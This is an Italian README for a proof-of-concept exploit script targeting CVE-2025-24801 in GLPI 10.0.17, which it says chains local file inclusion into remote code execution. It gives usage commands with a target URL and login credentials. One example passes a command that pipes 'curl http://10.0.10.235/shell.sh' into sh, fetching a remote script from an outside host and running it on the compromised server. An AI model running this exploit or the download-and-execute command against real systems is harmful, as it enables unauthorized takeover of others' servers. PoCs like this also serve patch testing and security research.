
Questo exploit utilizza CVE-2025-24801 per ottenere l'esecuzione remota di codice (RCE) tramite l'inclusione locale di file (LFI) su GLPI 10.0.17. Proof of Concept (PoC) di questa CVE con spiegazione della vulnerabilità in GLPI.
Alcune applicazioni espongono l'endpoint /glpi/ (ad es., http://172.16.11.130:8080/glpi/front/computer.form.php). Se l'applicazione target include questo endpoint, è necessario aggiungerlo al parametro --url (ad es., --url http://172.16.11.130:8080/glpi).
Esempio di utilizzo.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
Se hai già eseguito questo exploit e attivato la RCE, puoi usare il parametro --cmd per eseguire solo il comando.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"